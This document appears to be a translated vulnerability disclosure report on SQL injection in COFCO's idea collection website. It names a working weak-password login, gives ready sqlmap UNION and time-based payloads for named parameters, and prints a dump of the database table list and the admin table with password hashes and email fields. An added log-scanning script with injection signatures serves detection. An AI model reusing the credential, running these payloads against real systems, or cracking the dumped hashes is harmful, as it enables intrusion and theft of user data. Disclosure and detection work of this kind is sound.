Vulnerability details

Disclosure status:

2015-07-14: Details sent to the vendor; awaiting the vendor's response
2015-07-15: Vendor has confirmed; details visible to the vendor only
2015-07-25: Details disclosed to core white hats and experts in the relevant field
2015-08-04: Details disclosed to regular white hats
2015-08-14: Details disclosed to intern white hats
2015-08-29: Details disclosed to the public

Brief description:

As per the title.

Details:

URL: http://idea.cofco.com/, the COFCO idea collection management system. The account lxia with the weak password 123456 can log in.
URLs: http://idea.cofco.com/?m=News&a=newsdetails&news_id=118,
http://idea.cofco.com/?m=News&a=activity&news_id=108 and http://idea.cofco.com/index.php/Idea_plat/idea_details/id/92484/inde. In the first two, the news_id parameter is injectable; in the third, the pseudo-static (URL-rewritten path) id parameter is injectable.
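The two request shapes above (news_id in the query string, and the id segment of the pseudo-static path) are exactly what a defender would want to pick out of the web server's access log. The following is an added example, not code from the report or from the affected application: the log lines are constructed, the `/idea_details/id/` route pattern is taken from the URL above, and treating every `id`/`*_id` query key as a purely numeric value is an assumption about the application.

```python
# Added example (not the report's code): flag injection attempts against id parameters
# in Apache access logs. Log lines below are constructed; treating every "id"/"*_id"
# query key as a numeric id is an assumption about the application.
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Apache "combined" log line: only the client IP and the request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*"')
# Pseudo-static route from the report: /index.php/Idea_plat/idea_details/id/<value>/...
PSEUDO_RE = re.compile(r'/idea_details/id/([^/]+)')
# Signatures for the two techniques sqlmap reported: UNION-based and time-based blind.
SQLI_RE = re.compile(r'union\s+(all\s+)?select|sleep\s*\(|benchmark\s*\(', re.IGNORECASE)

def id_values(target):
    """Return (parameter, decoded value) pairs for every id-like input in a request target."""
    url = urlparse(target)
    found = [(key, val) for key, vals in parse_qs(url.query, keep_blank_values=True).items()
             for val in vals if key == 'id' or key.endswith('_id')]
    found += [('path:id', unquote_plus(m)) for m in PSEUDO_RE.findall(url.path)]
    return found

def classify(line):
    """Return (ip, parameter, value, reason) for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for param, value in id_values(m.group('target')):
        if SQLI_RE.search(value):
            return m.group('ip'), param, value, 'sqli-signature'
        if not value.isdigit():  # ids here are numeric database keys; anything else is anomalous
            return m.group('ip'), param, value, 'non-numeric-id'
    return None

def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (not real traffic) modelled on the request shapes in the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Aug/2015:10:00:01 +0800] "GET /?m=News&a=newsdetails&news_id=118 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [29/Aug/2015:10:00:02 +0800] "GET /?m=News&a=newsdetails&news_id=-1831)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"',
    '203.0.113.5 - - [29/Aug/2015:10:00:09 +0800] "GET /?m=News&a=activity&news_id=105)%20AND%20SLEEP(5)%20AND%20(6137=6137 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"',
    '203.0.113.5 - - [29/Aug/2015:10:00:10 +0800] "GET /index.php/Idea_plat/idea_details/id/92484/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [29/Aug/2015:10:00:11 +0800] "GET /index.php/Idea_plat/idea_details/id/92484%27/ HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
]
```

Calling `scan(SAMPLE_LOG)` returns three hits: the UNION probe, the SLEEP probe, and the quoted pseudo-static id; the two plain numeric requests are left alone.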

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: news_id
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: news_id=-1831) UNION ALL SELECT NULL,NULL,CONCAT(0x3a67616a3a,0x4142504374584f66705a,0x3a776d693a),NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: news_id=105) AND SLEEP(5) AND (6137=6137
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL >= 5.0.0
Database: chinafood
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cofco_userinfo | 6410 |
| cofco_userlog | 3050 |
| cofco_department | 2125 |
| cofco_credit | 1607 |
| cofco_creative_log | 335 |
| cofco_message | 321 |
| cofco_creative | 177 |
| cofco_praise | 172 |
| cofco_vote | 154 |
| cofco_make_action | 137 |
| cofco_access | 85 |
| cofco_creative_status | 79 |
| cofco_collect | 75 |
| cofco_comment | 61 |
| cofco_node | 52 |
| cofco_feedback | 39 |
| cofco_creative_draft | 37 |
| cofco_admin_message | 22 |
| cofco_dangqiuserinfo | 14 |
| cofco_coverimglist | 11 |
| cofco_auditer | 9 |
| cofco_newscenter | 9 |
| cofco_role_user | 8 |
| cofco_write_userinfo | 8 |
| cofco_dangqi | 6 |
| cofco_intergal_bj | 6 |
| cofco_admin | 4 |
| cofco_lotteryinfo | 4 |
| cofco_role | 4 |
| cofco_goods | 3 |
| cofco_news_activity | 3 |
| cofco_orders | 3 |
| documents | 3 |
| cofco_lottery_user | 2 |
| cofco_news | 2 |
| cofco_version | 2 |
| cofco_andriodinfo | 1 |
| cofco_email_template | 1 |
| cofco_iosinfo | 1 |
| cofco_lottery_goods | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 767 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| PARTITIONS | 82 |
| TABLES | 82 |
| STATISTICS | 64 |
| KEY_COLUMN_USAGE | 50 |
| TABLE_CONSTRAINTS | 50 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 18 |
| TABLE_PRIVILEGES | 12 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 3 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

Database: chinafood
Table: cofco_admin
[4 entries]
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+
| aid | pwd | email | status | remark | `time` | nickname | find_code |
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+
| 1 | dd8d34ebd7ddaf48ccf14abbc0d5a4ba | [email protected] | 1 | 我是超级管理员哈哈~~ | 1378706881 | 超级管理员 | <blank> |
| 16 | 7d1fa7fc2c5079a9758af35ecf1c4173 | [email protected] | 1 | 管理员 | 1388223174 | 管理员 | 2 |
| 23 | fdab0aeb573f2395c8fbd34306ccf94f | [email protected] | 1 | <blank> | 1390725529 | NULL | NULL |
| 22 | b6904ee5255db1bb7be5b760470b6914 | [email protected] | 1 | <blank> | 1390725476 | NULL | NULL |
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+


(Seven screenshots, 1.png through 7.png, accompanied the original report.)

Proof of vulnerability:

(The same seven screenshots, 1.png through 7.png, as in the details section.)

Fix recommendation:

...

Tags: none